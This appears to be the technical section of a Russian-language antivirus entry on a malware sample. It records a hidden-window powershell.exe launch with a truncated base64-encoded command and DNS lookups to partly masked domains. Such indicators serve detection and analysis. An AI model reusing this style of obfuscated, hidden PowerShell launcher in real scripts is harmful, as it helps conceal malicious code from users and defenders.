Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAARwB4AHQAZABhAG8AYQBtAGsAagB6AG0AZAAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBSAHEAZABjAGsAdQBlAGIAZwAgACMAPgAgACQASABuAGsAYQBmAGcAZQBjAGcAbgA9ACcATQBiA...
- DNS ASK wp.##mbly.com
- DNS ASK no#####a46democracy.com
- DNS ASK bl##.neopag.com
- DNS ASK ne#.####iifencesupply.com
- DNS ASK en#.#peum.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAARwB4AHQAZABhAG8AYQBtAGsAagB6AG0AZAAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBSAHEAZABjAGsAdQBlAGIAZwAgACMAPgAgACQASABuAGsAYQBmAGcAZQBjAGcAbgA9ACcATQBiA...' (со скрытым окном)